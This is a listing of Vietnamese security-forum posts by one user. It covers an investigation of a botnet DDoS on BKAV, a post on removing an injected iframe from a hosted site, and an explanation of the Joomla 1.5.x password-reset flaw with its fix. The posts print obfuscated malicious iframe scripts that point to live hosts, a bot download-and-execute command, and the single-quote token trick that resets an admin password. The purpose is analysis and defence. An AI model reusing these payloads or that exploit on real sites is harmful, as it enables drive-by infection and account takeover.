<![CDATA[Messages posted by "hackerbinhphuoc"]]> /hvaonline/posts/listByUser/56742.html JForum - http://www.jforum.net Re: Hỏi Về Chiếm Hữu Phiên Làm Việc /hvaonline/posts/preList/27225/166942.html#166942 /hvaonline/posts/preList/27225/166942.html#166942 GMT Re: Hỏi Về Chiếm Hữu Phiên Làm Việc /hvaonline/posts/preList/27225/166472.html#166472 /hvaonline/posts/preList/27225/166472.html#166472 GMT Re: Storm7Shell là gì các bạn ? Web mình dính con này /hvaonline/posts/preList/27204/166194.html#166194 /hvaonline/posts/preList/27204/166194.html#166194 GMT Re: Thủ phạm tấn công DDoS một số website VN bị bắt /hvaonline/posts/preList/25549/155161.html#155161 /hvaonline/posts/preList/25549/155161.html#155161 GMT Re: Thủ phạm tấn công DDoS một số website VN bị bắt /hvaonline/posts/preList/25549/154993.html#154993 /hvaonline/posts/preList/25549/154993.html#154993 GMT Re: Thủ phạm tấn công DDoS một số website VN bị bắt http://www.bkav.com.vn bị tấn công botnet, đến chiều hôm đó tôi đăng tin lên trang http://vietnamsecurity.googlepages.com, ngày hôm sau các báo bắt đầu đăng tin và phỏng vấn BKIS về vụ việc tuy nhiên bkis đã phủ nhận tất cả thông tin và đính chính là vụ việc trên chỉ là hoạt động nâng cấp thường nhật của BKAV. Sau đây là những hình ảnh chụp được ngày 5/10: http://img360.imageshack.us/img360/3162/bkavek1.jpg
Tuy nhiên, tôi vẫn tiếp tục nhận được thông tin bkav bị ddos, website bkav.com.vn tiếp tục hoạt động chập chờn và thậm chí có lúc không truy cập vào được trong thời gian dài! đến lúc này thì thông báo việc nâng cấp của bkav không còn hợp lý nữa, nó củng cố thêm thông tin cho là bkav.com.vn bị tấn công botnet. Sau đây là những hình ảnh cập nhật sau đó: http://vietnamsecurity.googlepages.com/bkav5.JPG
http://vietnamsecurity.googlepages.com/bkav6.JPG
http://vietnamsecurity.googlepages.com/bkav7.JPG
Đồng thời vào 17h ngày 7/10 tôi lại nhận được những hình ảnh chụp màn hình được cho là hình ảnh tấn công trang bkav.com.vn và một file có tên là BKAV.exe ( được cho là file tấn công bkav.exe) http://vietnamsecurity.googlepages.com/bkis1.JPG
http://vietnamsecurity.googlepages.com/bkis2.JPG
http://vietnamsecurity.googlepages.com/bkis3.jpg
Đồng thời trên mạng cũng xuất hiện các thông tin cho rằng có một người đã dùng các chèn mã độc vào các bản crack BKAV pro, các bản auto game và chèn iframe vào các website lớn để từ đó xây dựng mạng botnet để tấn công http://www.bkav.com.vn Tìm thông tin Sau khi nhận thông tin và phản hồi từ các báo chí và bạn bè, tôi tiến hành điều tra sự việc! Tôi tìm bắt tìm thông tin về các hacker hay sử dụng botnet, các loại botnet phổ biến ở Việt Nam, tìm các các diễn đàn lớn đã bị tấn công trong thời gian qua để tìm manh mối! đồng thời nhờ người có kinh nghiệm tiến hành thử nghiệm và phân tích cơ chế hoạt động của của file BKAV.exe. Kết quả là tôi cũng tìm được một số manh mối: Sau khi phân tích file BKAV.exe cho thấy đây là một loại virus nội, đã được đưa vào danh sách virus của BKAV, thông tin thêm: http://bkav.com.vn/thong_tin_virus/13/08/2008/3/1755/ đồng thời tìm kiếm trên các forum lớn, tôi tìm được các thông tin sau: http://vietnamsecurity.googlepages.com/trojan.jpg

đây là đoạn mã chèn file vào website, cụ thể ở đây là 4gamevn.com, cơ chế của nó là tự download file trojan.exe về máy người dùng và thực thi. Thông tin này càng lý giải cho việc làm sao một học sinh trung học có thể xây dựng một mạng lưới bot net với tầm hơn 100 ngàn victim! Sau khi download file trojan.exe về, tôi tíên hành dịch ngược và may mắn có được email của người viết con trojan này! Tuy nhiên vẫn chưa có được chứng cứ cụ thể về vụ việc tấn công BKAV. Từ địa chỉ email đó tôi bắt đầu tìm được những thông tin cá nhân của kẻ tấn công, hình ảnh, các forum người này tham gia! nó có email là: Linh_XXX@yahoo.com , từ đó tôi vào blog, đồng thời cũng biết được níck trên mạng của kẻ đó là LLY. . ., một tay chơi botnet còn khá nhỏ tuổi ở Việt Nam, tôi bắt đầu tìm hiểu cách xây dựng mạng Botnet của Lly. . . Câu chuyện hé mở: Qua tìm hiểu cho thấy kẻ tấn công còn trẻ tuy nhiên có sự nghiên cứu về botnet, cc chùa, và biết lập trình! Lly… đã viết cho mình một chương trình botnet mới dựa trên nền tảng mIRC để điều khiển các victim. Sau đó lly… đã cài con virus này vào các chương trình chơi auto game, chương trình crack Bkpro (chưa tìm ra phiên bản để kiểm chứng), đồng thời dựa vào các mối quan hệ với các tay chơi botnet khác kiếm shell trên các diễn đàn lớn, đông lựơt truy cập để cài iframe vào các diễn đàn đó, thậm chí có thể lly đã cài vào chính diễn đàn về âm nhạc và giải trí mà lly đang quản lý! Sau khi victim bị nhiễm vào máy sẽ thự động nhận lệnh từ một file có trên website của kẻ tấn công: http://www.xxx.net/server/php nội dung của file này có dạng như sau: http://vietnamsecurity.googlepages.com/server.JPG
[Server] server=irc. port=6667 chan=#zz ver=3 IP=58.xxx.xxx.xxx với các thông số: Server: đây là server irc để victim connect vào! vậy tại sao ở đây chỉ là irc? Đó chính là vì kẻ tấn công muốn bình thường victim không thể connect tới server được, khi nào kẻ tấn công chỉnh lại file server.php thì victim mới connect vào! Port:6667 là port mặt định của IRC Chan: đây là room mà kẻ tấn công sẽ tạo ra để điều khiển các victim Ver=3: là version của virus botnet này, có nó chức năng tự động cập nhật khi phiên bản trong máy victim cũ! IP=58.xxx.xxx.xxx: đây là ip của kẻ tấn công Sau khi nhận lệnh từ file server.php, máy của vitim sẽ tự động connect tới server IRC.nhac…..vn và join vào room ZZ Kẻ tấn công đã khéo léo viết chương trình botnet nhận lệnh từ mIRC Cấu trúc câu lệnh như sau: !lly… download http://www.xxx.vn/bkav.exe c:\a.exe 1 Ý nghĩa của nó là sẽ tự động download file bkav.exe từ server về máy victim và tự động thực thi! File bkav.exe có nhiệm vụ là ghi vào regstry những biến để liên tục ping đến server bkav.exe gây ra cuộc tấn công từ chối dịch vụ! vậy khi cần thực hiện cuộc tấn công, lly.. chỉ cần connect vào mạng mIRC và gõ vài câu lệnh! Note: Bạn hackerbinhphuoc, websever mà bạn hosting website http://vietnamsecurity.googlepages.com và các file image của bạn hạn chế băng thông sử dụng một cách khăt khe. Vì vây rất nhiều lúc các hình ảnh minh họa bài viết của bạn không hiên lên HVA forum được, hay hiện rất chậm. Ngoài ra khuôn khổ các image quá lớn nên khi load lên khung hình (table) HVA forum bị broken nghiêm trọng, làm khó đọc bài viết. Tôi đã save chúng, sửa lại và hosting chúng trên webserver của tôi. Khi nào có nơi hosting tốt, bạn có thể thay đổi lại..PXMMRF ]]>
/hvaonline/posts/preList/25549/154812.html#154812 /hvaonline/posts/preList/25549/154812.html#154812 GMT
Re: Khai thác và phòng chống file upload trong PHP Web Applications Mấu chốt giải quyết vấn để làm thế nào an toàn trong file upload đó là lưu giữ file upload lên một nơi mà không thể truy cập bởi user thông qua URL  em nghĩ là đó chỉ là giải pháp cho các website lớn, quản trị cả sever, còn đối với phần lớn các website vừa và nhỏ dùng host share thì giải pháp tốt nhất là cấm chạy script trong folder uploads ( tuy nhiên không tránh được trường hợp upload sang folder khác hoặc include files)]]> /hvaonline/posts/preList/25298/153785.html#153785 /hvaonline/posts/preList/25298/153785.html#153785 GMT Re: Khai thác và phòng chống file upload trong PHP Web Applications /hvaonline/posts/preList/25298/153707.html#153707 /hvaonline/posts/preList/25298/153707.html#153707 GMT Re: Khai thác và phòng chống file upload trong PHP Web Applications /hvaonline/posts/preList/25298/153692.html#153692 /hvaonline/posts/preList/25298/153692.html#153692 GMT Re: Khai thác và phòng chống file upload trong PHP Web Applications /hvaonline/posts/preList/25298/153677.html#153677 /hvaonline/posts/preList/25298/153677.html#153677 GMT Thắc mắc về sự khác nhau của mục "Bài gởi sau cùng " /hvaonline/posts/preList/24877/150288.html#150288 /hvaonline/posts/preList/24877/150288.html#150288 GMT cách tránh bị virus từ sever gây hại đến website http://www.hkp.com/index.php và đoạn mã chèn vào file index.php có dạng là: Code:
<script>

<!--

var d=document,kol=561;

function O10H48B5552374583(H48B555237497D){ function H48B5552374D79() {return 16;} return( parseInt(H48B555237497D,H48B5552374D79()));}function H48B555237557D(H48B555237596E){ var H48B5552376563 = 2; var H48B5552375D6A='';for(H48B5552376166=0; H48B5552376166<H48B555237596E.length; H48B5552376166+=H48B5552376563){ H48B5552375D6A += ( String.fromCharCode (O10H48B5552374583(H48B555237596E.substr(H48B5552376166, H48B5552376563))));}return H48B5552375D6A;} document.write(H48B555237557D('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313537383130292B2730343564646434666262325C272077696474683D373334206865696768743D323135207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));

//-->

</script>
giải mã ra được: Code:
<IFRAME name=O1 src=\'http://77.221.133.171/.if/go.html?'+Math.round(Math.random()*15375)+'28539d6\' width=75 height=205 style=\'display: none\'></IFRAME >');}var myia=true;</script>
hoặc là đoạn code này: Code:
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%62%61%64%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%6b%61%72%61%62%6f%6b%2e%62%69%7a%2f%73%70%2f%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%34%34%33%35%31%34%29%2b%27%65%37%64%63%30%66%66%35%65%32%39%34%5c%27%20%77%69%64%74%68%3d%37%36%36%20%68%65%69%67%68%74%3d%35%37%39%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>
xem xét lại thì đây là con virus nhiễm vào server và tự động chèn mã độc vào những file index.x ( hoặc default.x) với x có thể là html,php,asp,aspx. . . tìm thêm thông tin thì nó là con này: trojan clicker html iframe ru vậy làm sao chống lại khi mà mình không phải là quản trị của server này đây ? sau một hồi tìm hiểu mình nhận ra là nó chỉ chèn iframe vào các file index thôi, vậy thì mình đổi file mặc định thử xem! đầu tiên: mình vào web settings chỉnh lại default docs, thay vì là index.html mình chỉnh thành trangchu.html, index.php thành trangchu.php! sau đó: vào host rename nhưng file dạng index.x hay default.x thành trangchu.x thôi ( nếu liên quan tới code thì vào code chỉnh lại) vậy là mình có thể tạm thời tránh việc bị chèn iframe trong lúc chờ admin server diệt virus rồi! đây là một cách nhỏ của em tránh việc chèn iframe đối với các virus chỉ chèn vào file index! anh nào có cách hay hơn xin chia sẻ với em!]]>
/hvaonline/posts/preList/24613/148739.html#148739 /hvaonline/posts/preList/24613/148739.html#148739 GMT
Re: Xin tư vấn về trung tâm đào tạo CEH ỡ TPHCM http://www.athena.com.vn]]> /hvaonline/posts/preList/24335/147127.html#147127 /hvaonline/posts/preList/24335/147127.html#147127 GMT Re: 05 Bước khai thác Joomla 1.5.x (Remote Admin Password Change ) /hvaonline/posts/preList/24333/147125.html#147125 /hvaonline/posts/preList/24333/147125.html#147125 GMT Re: 05 Bước khai thác Joomla 1.5.x (Remote Admin Password Change ) http://hkp.com.vn/index.php?option=com_user&view=reset&layout=confirm dòng này được tạo ra khi điền email để forgot pasword và 1 Token đã gửi về mail, form này dùng để điền Token đó! Tuy nhiên lại phát sinh lỗi ở dòng: Code:
$db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token));  <
nhiệm vụ của nó là liệt kê ra user có activation = cái token vừa nhập vào và cho phép đổi password mới. Vì vậy khi ta chèn kí tự ' vào thì lệnh nó sẽ trở thành: Code:
SELECT id FROM jos_users WHERE block = 0 AND activation = ''
nó lại đi liệt kê ra các user có activation là rỗng thay vì là user có activation phù hợp và theo nguyên tắc chỉ lấy 1 kết quả, nó sẽ lấy user có id nhỏ nhất và thường thì đó là tài khoản của admin! vì vậy dẫn tới việc password của admin bị reset! Cách khắc phục: - Nâng cấp phiên bản Joomla! mới nhất (1.5.6 hoặc mới hơn), hoặc sửa lỗi trong file /components/com_user/models/reset.php với đoạn mã sau: Sau global $mainframe; trên dòng 113 của file reset.php, thêm: Code:
if(strlen($token) != 32) {

       {

              $this->setError(JText::_('INVALID_TOKEN'));

              return false;

       }
]]>
/hvaonline/posts/preList/24333/147059.html#147059 /hvaonline/posts/preList/24333/147059.html#147059 GMT
Re: làm sao tìm folder cua admin? /hvaonline/posts/preList/20923/126450.html#126450 /hvaonline/posts/preList/20923/126450.html#126450 GMT [Help] Giúp em delete con backdoor. /hvaonline/posts/preList/12006/83406.html#83406 /hvaonline/posts/preList/12006/83406.html#83406 GMT [Help] Giúp em delete con backdoor. /hvaonline/posts/preList/12006/83344.html#83344 /hvaonline/posts/preList/12006/83344.html#83344 GMT [Help] Giúp em delete con backdoor. /hvaonline/posts/preList/12006/83254.html#83254 /hvaonline/posts/preList/12006/83254.html#83254 GMT [Help] Giúp em delete con backdoor. /hvaonline/posts/preList/12006/83183.html#83183 /hvaonline/posts/preList/12006/83183.html#83183 GMT [Help] Giúp em delete con backdoor. /hvaonline/posts/preList/12006/82971.html#82971 /hvaonline/posts/preList/12006/82971.html#82971 GMT [Help] Giúp em delete con backdoor. /hvaonline/posts/preList/12006/82967.html#82967 /hvaonline/posts/preList/12006/82967.html#82967 GMT